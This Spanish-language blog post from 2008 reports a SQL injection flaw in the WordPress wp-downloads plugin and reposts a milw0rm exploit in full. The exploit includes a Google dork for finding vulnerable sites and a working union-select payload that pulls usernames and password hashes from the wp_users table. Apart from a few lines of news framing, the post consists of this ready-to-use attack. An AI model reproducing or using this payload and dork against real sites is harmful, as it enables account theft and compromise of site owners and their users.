Home > noticias > vulnerabilidad en un plugin de wordpress

vulnerabilidad en un plugin de wordpress

April 1st, 2008 admin

hoy mediante el blog de mi amigo neri

me informe sobre una vulnerabilidad que afecta un plugin de wordpress el cual se llama wp-downloads
el plugin es vbulnerable a una inyeccion SQL.

el exploit fue subido a milw0rm aca les dejo el codigo

url: http://milw0rm.com/exploits/5326
###############################################################
#
# WordPress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:

http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]

SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################

# milw0rm.com [2008-03-31]

Categories: noticias Tags: hacking, vulnerabilidades

Comments are closed.

cuanto vale tu pagina web?? joomla vulnerable a SQL inyection

Exactlimon y la web 2.0

vulnerabilidad en un plugin de wordpress

NuBe de etiquetas

social

Recent Comments

Archives

Categories

Blogroll